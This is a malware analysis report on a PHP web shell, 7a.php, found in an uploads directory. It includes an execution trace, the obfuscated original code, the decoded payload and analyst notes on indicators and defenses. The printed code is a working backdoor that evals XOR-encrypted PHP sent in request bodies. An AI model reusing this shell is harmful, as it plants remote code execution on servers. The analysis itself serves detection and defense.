PHP Malware Analysis

7a.php

md5: 5dd5851fb4118e02126b99711194e69a


Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

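Failed to deobfuscate code (the automated deobfuscator did not succeed; the decoded payload is still recoverable from the execution trace below, where it appears as the return value of the second str_replace call and as the argument passed to create_function)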

Execution traces

data/traces/5dd5851fb4118e02126b99711194e69a_trace-1676240481.2793.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:21:47.177148]
1	0	1	0.000130	393464
1	3	0	0.000190	396424	{main}	1		/var/www/html/uploads/7a.php	0	0
1		A						/var/www/html/uploads/7a.php	2	$E = '#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV'
2	4	0	0.000225	396424	str_replace	0		/var/www/html/uploads/7a.php	3	3	'LG'	''	'LGcreaLGteLG_LGfuLGncLGtion'
2	4	1	0.000242	396560
2	4	R			'create_function'
1		A						/var/www/html/uploads/7a.php	3	$S = 'create_function'
1		A						/var/www/html/uploads/7a.php	4	$l = 's("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V'
1		A						/var/www/html/uploads/7a.php	5	$D = '$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B'
1		A						/var/www/html/uploads/7a.php	6	$n = '{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content'
1		A						/var/www/html/uploads/7a.php	7	$b = 'gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for'
1		A						/var/www/html/uploads/7a.php	8	$g = '#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}'
1		A						/var/www/html/uploads/7a.php	9	$U = '($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k'
2	5	0	0.000357	397104	str_replace	0		/var/www/html/uploads/7a.php	10	3	'V#'	''	'$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#BgWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#contents("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV#ean();'
2	5	1	0.000393	397712
2	5	R			'$k="827ccb0e";$kh="ea8a706c4c34";$kf="a16891f84e7b";$p="hqUDnUDlYBgWvvWN";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/7a.php	10	$t = '$k="827ccb0e";$kh="ea8a706c4c34";$kf="a16891f84e7b";$p="hqUDnUDlYBgWvvWN";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000450	396976	create_function	0		/var/www/html/uploads/7a.php	11	2	''	'$k="827ccb0e";$kh="ea8a706c4c34";$kf="a16891f84e7b";$p="hqUDnUDlYBgWvvWN";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000530	405016	{internal eval}	1		/var/www/html/uploads/7a.php	11	0
3	7	1	0.000544	405016
3	7	R			NULL
2	6	1	0.000559	403648
2	6	R			'\000lambda_1'
1		A						/var/www/html/uploads/7a.php	11	$z = '\000lambda_1'
2	8	0	0.000586	403584	__lambda_func	1		/var/www/html/uploads/7a.php	11	0
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$k = '827ccb0e'
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$kh = 'ea8a706c4c34'
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$kf = 'a16891f84e7b'
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$p = 'hqUDnUDlYBgWvvWN'
3	9	0	0.000646	403640	file_get_contents	0		/var/www/html/uploads/7a.php(11) : runtime-created function	1	1	'php://input'
3	9	1	0.000666	404376
3	9	R			''
3	10	0	0.000680	404360	preg_match	0		/var/www/html/uploads/7a.php(11) : runtime-created function	1	3	'/ea8a706c4c34(.+)a16891f84e7b/'	''	NULL
3	10	1	0.000727	404520
3	10	R			0
2	8	1	0.000742	404280
1	3	1	0.000749	404280
			0.000773	321696
TRACE END   [2023-02-12 20:21:47.177817]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
/*
 * ANALYST ANNOTATIONS (comments only; every code token below is unchanged).
 * The md5 listed for this sample refers to the original, uncommented file, so
 * this annotated copy will not match it.
 *
 * What the file does, as shown by the code and the recorded execution trace:
 *   1. Stores a PHP payload as eight string fragments ($E, $l, $D, $n, $b,
 *      $g, $U) padded with the filler token 'V#', and hides the name
 *      'create_function' behind the filler token 'LG'.
 *   2. Strips both fillers with str_replace(), then compiles the rebuilt
 *      payload into an anonymous function via create_function() and calls it.
 *   3. The rebuilt payload (visible in the trace) reads the raw request body
 *      from php://input and looks for data between the markers ea8a706c4c34
 *      and a16891f84e7b. On a match it base64-decodes the captured data,
 *      applies a repeating-key XOR with the key 827ccb0e (helper x()),
 *      gzuncompress()es the result and passes it to eval().
 *   4. Output of the eval'd code is captured with output buffering,
 *      gzcompress()ed, XORed with the same key, base64-encoded and printed
 *      wrapped as: prefix hqUDnUDlYBgWvvWN + start marker + data + end marker.
 *
 * Net effect: any request body carrying the marker pair results in
 * request-supplied PHP being executed. Every risky call is prefixed with '@',
 * so failures are not reported. In the recorded trace the body was empty,
 * preg_match() returned 0, and nothing was evaluated (hence the empty HTML).
 *
 * Defender notes:
 *   - Static indicators: a function name assembled by str_replace() and then
 *     invoked through a variable ($S(...), $z()); long string fragments with
 *     a repeated filler token; no literal "eval" or "create_function" in the
 *     file, so plain keyword greps miss it.
 *   - Network indicators: request bodies containing the two hex markers above,
 *     and responses beginning with the fixed prefix followed by the start
 *     marker.
 *   - Runtime dependency: create_function() and the $t{$i} string-offset
 *     syntax used inside the payload were both removed in PHP 8.0, so the
 *     sample relies on an older interpreter.
 *   - The trace shows the file under an uploads/ directory; denying script
 *     execution in upload locations prevents files like this from running.
 */

// Fragment 6 of 7 (assembly order is set at the $t line): decode chain tail and output-buffer read.
$E='#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV';
// Removes the 'LG' filler; the trace records the result as 'create_function'.
$S=str_replace('LG','','LGcreaLGteLG_LGfuLGncLGtion');
// Fragment 5 of 7: php://input read, output-buffer start and the eval() call.
$l='s("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V';
// Fragment 1 of 7: XOR key ($k), start/end markers ($kh, $kf) and response prefix ($p).
$D='$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B';
// Fragment 4 of 7: end of the XOR helper and the preg_match() gate on the request body.
$n='{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content';
// Fragment 2 of 7: rest of the prefix string and the start of helper x($t,$k).
$b='gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for';
// Fragment 7 of 7: compress, XOR and base64-encode the captured output, then print it.
$g='#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}';
// Fragment 3 of 7: the repeating-key XOR loop body.
$U='($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k';
// Concatenates the fragments in execution order and strips the 'V#' filler,
// yielding the plaintext payload recorded in the trace.
$t=str_replace('V#','',$D.$b.$U.$n.$l.$E.$g);
// $S holds 'create_function': compiles $t as the body of a zero-argument
// function (internally an eval of the string) and invokes it immediately.
$z=$S('',$t);$z();
?>